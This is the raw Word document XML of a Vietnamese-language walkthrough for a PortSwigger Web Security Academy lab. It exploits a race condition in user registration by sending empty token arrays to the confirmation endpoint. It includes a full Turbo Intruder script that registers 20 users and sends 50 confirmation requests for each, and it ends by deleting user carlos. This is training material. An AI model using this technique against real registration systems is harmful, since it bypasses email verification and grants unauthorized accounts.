    <w:p w14:paraId="6C6A0386" w14:textId="06C3DAE6" w:rsidR="00FA542F" w:rsidRDefault="0054070F" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="135EDF4A" wp14:editId="5F0CBD37">
            <wp:extent cx="5943600" cy="1200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14:paraId="22B15CF5" w14:textId="0947EDB6" w:rsidR="0054070F" w:rsidRDefault="0054070F" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27771644" w14:textId="4D4BDFA3" w:rsidR="0054070F" w:rsidRDefault="00CE6F21" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thay vì phản hồi Forbidden, bạn nhận được thông báo "Invalid token: Array". Điều này cho thấy ứng dụng chấp nhận việc bạn truyền 1 mảng rỗng, có thể phù hợp với 1 token khi chưa khởi tạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF5C69" w14:textId="18190D13" w:rsidR="00CE6F21" w:rsidRDefault="00CE6F21" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14175F28" w14:textId="5E86C27B" w:rsidR="00CE6F21" w:rsidRDefault="00FE2032" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thêm hai yêu cầu POST /register và POST /confirm?token=1 vào 1 nhóm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C353CFE" w14:textId="0171B0B9" w:rsidR="00D52AFD" w:rsidRDefault="00D52AFD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01955186" w14:textId="5E05C1A7" w:rsidR="00D52AFD" w:rsidRDefault="00D52AFD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gửi nhóm yêu cầu trên theo tuần tự và song song</w:t>
      </w:r>
      <w:r w:rsidR="00592853">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00891375">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đổi tên người dùng mỗi lần để tránh gặp thông báo "</w:t>
      </w:r>
      <w:r w:rsidR="00891375" w:rsidRPr="00891375">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Account already exists with this name</w:t>
      </w:r>
      <w:r w:rsidR="00891375">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
      <w:r w:rsidR="00592853">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Để ý thấy phản hồi xác nhận lúc nào cũng đến nhanh hơn phản hồi đăng kí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE302E8" w14:textId="28F34397" w:rsidR="00891375" w:rsidRDefault="00891375" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26701E55" w14:textId="77777777" w:rsidR="00891375" w:rsidRDefault="00891375" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong yêu cầu POST /register, tô đậm giá trị của username, sau đó chuột phải và chọn Extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="00891375">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Turbo Intruder</w:t>
      </w:r>
      <w:r w:rsidRPr="00891375">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Send to turbo intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FD4909" w14:textId="77777777" w:rsidR="00891375" w:rsidRDefault="00891375" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AD59FE" w14:textId="77777777" w:rsidR="008D2F68" w:rsidRDefault="008D2F68" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong turbo intruder, để ý thấy tham số username được đánh dấu %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1774D25F" w14:textId="70A1572B" w:rsidR="00891375" w:rsidRDefault="008D2F68" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Đảm bảo tham số email đặt là carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@ginandjuice.shop</w:t>
      </w:r>
      <w:r w:rsidR="00891375">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(email chưa được đăng kí trên trang web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789A02C8" w14:textId="305E3F71" w:rsidR="008D2F68" w:rsidRDefault="008D2F68" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhớ ghi lại giá trị của tham số password để tiện đăng nhập sau này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4B21C" w14:textId="77777777" w:rsidR="008D2F68" w:rsidRDefault="008D2F68" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA826F2" w14:textId="1FEB0D79" w:rsidR="00592853" w:rsidRDefault="00592853" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1770A2AB" w14:textId="77777777" w:rsidR="00592853" w:rsidRDefault="00592853" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762DC8AF" w14:textId="22482740" w:rsidR="00D52AFD" w:rsidRDefault="004F67E1" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20ED12F0" wp14:editId="09307012">
            <wp:extent cx="5943600" cy="249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45168B61" w14:textId="0CEDECDF" w:rsidR="004F67E1" w:rsidRDefault="004F67E1" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA4D851" w14:textId="15C08C8B" w:rsidR="004F67E1" w:rsidRDefault="00B956CD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chọn template examples/race-single-packet-attack.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC70A3" w14:textId="21D9E346" w:rsidR="00B956CD" w:rsidRDefault="00B956CD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF0C7E6" w14:textId="3BC8F2AC" w:rsidR="00B956CD" w:rsidRDefault="00B956CD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chỉnh sửa tập lệnh như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27129291" w14:textId="0E8D959A" w:rsidR="00B956CD" w:rsidRDefault="00B956CD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8FCB2B" w14:textId="77777777" w:rsidR="00344424" w:rsidRPr="00344424" w:rsidRDefault="00344424" w:rsidP="00344424">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097213FB"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def queueRequests(target, wordlists):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875321D" w14:textId="77777777" w:rsidR="00344424" w:rsidRPr="00344424" w:rsidRDefault="00344424" w:rsidP="00344424">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431069A3"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engine = RequestEngine(endpoint=target.endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B169A7"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concurrentConnections=1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F2AE6"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engine=Engine.BURP2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D7D5D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F4163"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C3C52"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confirmationReq = '''POST /confirm?token[]= HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB2E8F6"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Host: YOUR-LAB-ID.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FF0AB"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Cookie: phpsessionid=YOUR-SESSION-TOKEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0BF03"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Content-Length: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0CCFB4" w14:textId="77777777" w:rsidR="00344424" w:rsidRPr="00344424" w:rsidRDefault="00344424" w:rsidP="00344424">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7988D85F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1A642"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for attempt in range(20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3DB44"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        currentAttempt = str(attempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF7667"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username = 'User' + currentAttempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E17D2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B04BB4B"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 queue a single registration request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F91E437"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engine.queue(target.req, username, gate=currentAttempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED061E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02109BB9"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 queue 50 confirmation requests - note that this will probably sent in two separate packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5232AE1F"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for i in range(50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4EB1A7"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engine.queue(confirmationReq, gate=currentAttempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F025512"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278661B1"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 send all the queued requests for this attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E8815"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engine.openGate(currentAttempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A978417" w14:textId="77777777" w:rsidR="00344424" w:rsidRPr="00344424" w:rsidRDefault="00344424" w:rsidP="00344424">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B346DD" w14:textId="77777777" w:rsidR="00344424"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def handleResponse(req, interesting):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B0EF03" w14:textId="07BFAE68" w:rsidR="00B956CD" w:rsidRPr="00344424" w:rsidRDefault="00344424" w:rsidP="00344424">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00344424">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    table.add(req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F926E9F" w14:textId="0FAAB55D" w:rsidR="00344424" w:rsidRDefault="00344424" w:rsidP="00344424">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4789D5" w14:textId="57B8DC00" w:rsidR="00DF0A5D" w:rsidRDefault="00D201A2" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tập lệnh đăng kí 20 người dùng mới, mỗi người dùng sẽ gửi yêu cầu xác nhận 50 lần. Gửi tham số token rỗng trước khi token được khởi tạo trong cơ sở dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E44B138" w14:textId="69DCC011" w:rsidR="00DF0A5D" w:rsidRDefault="00263405" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F7B3E4F" wp14:editId="24C2941D">
            <wp:extent cx="5943600" cy="337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54C144BC" w14:textId="1576C41B" w:rsidR="00263405" w:rsidRDefault="00263405" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084DF131" w14:textId="647246B6" w:rsidR="00263405" w:rsidRDefault="00263405" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đăng kí thành công cho user13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FA856" w14:textId="66B99427" w:rsidR="00263405" w:rsidRDefault="00263405" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78757CBF" w14:textId="6378A69D" w:rsidR="00263405" w:rsidRDefault="0011265F" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="423D9473" wp14:editId="3C0D40B8">
            <wp:extent cx="5943600" cy="2778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p w14:paraId="269CB1B9" w14:textId="645AD421" w:rsidR="0011265F" w:rsidRDefault="0011265F" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B88F299" w14:textId="2AE23378" w:rsidR="0011265F" w:rsidRPr="00D17B04" w:rsidRDefault="00A95314" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xóa người dùng carlos</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0011265F" w:rsidRPr="00D17B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314801"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3F4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42522"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A656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7B"/>
    <w:rsid w:val="000027A9"/>
    <w:rsid w:val="0005080A"/>
    <w:rsid w:val="0011265F"/>
    <w:rsid w:val="0011440C"/>
    <w:rsid w:val="00263405"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00344424"/>
    <w:rsid w:val="00406E23"/>
    <w:rsid w:val="0042642E"/>
    <w:rsid w:val="004F67E1"/>
    <w:rsid w:val="00524B41"/>
    <w:rsid w:val="0054070F"/>
    <w:rsid w:val="00592853"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00621BED"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00652D75"/>
    <w:rsid w:val="007531ED"/>
    <w:rsid w:val="00764741"/>
    <w:rsid w:val="007733D6"/>
    <w:rsid w:val="007907EA"/>
    <w:rsid w:val="007B78F3"/>
    <w:rsid w:val="00891375"/>
    <w:rsid w:val="008D2F68"/>
    <w:rsid w:val="00944D83"/>
    <w:rsid w:val="0098477B"/>
    <w:rsid w:val="00A95314"/>
    <w:rsid w:val="00B956CD"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BD2CB2"/>
    <w:rsid w:val="00C427AA"/>
    <w:rsid w:val="00C93601"/>
    <w:rsid w:val="00CE6F21"/>
    <w:rsid w:val="00D03FB6"/>
    <w:rsid w:val="00D17B04"/>
    <w:rsid w:val="00D201A2"/>
    <w:rsid w:val="00D47FB2"/>
    <w:rsid w:val="00D52AFD"/>
    <w:rsid w:val="00DF0A5D"/>
    <w:rsid w:val="00E41DC6"/>
    <w:rsid w:val="00E62556"/>
    <w:rsid w:val="00EA4D13"/>
    <w:rsid w:val="00F27ACD"/>
    <w:rsid w:val="00F65260"/>
    <w:rsid w:val="00FA542F"/>
    <w:rsid w:val="00FE203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CDB8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2E64323B-3B9F-8542-BEC9-6C8C9C69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426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2025-01-26T05:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-26T07:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>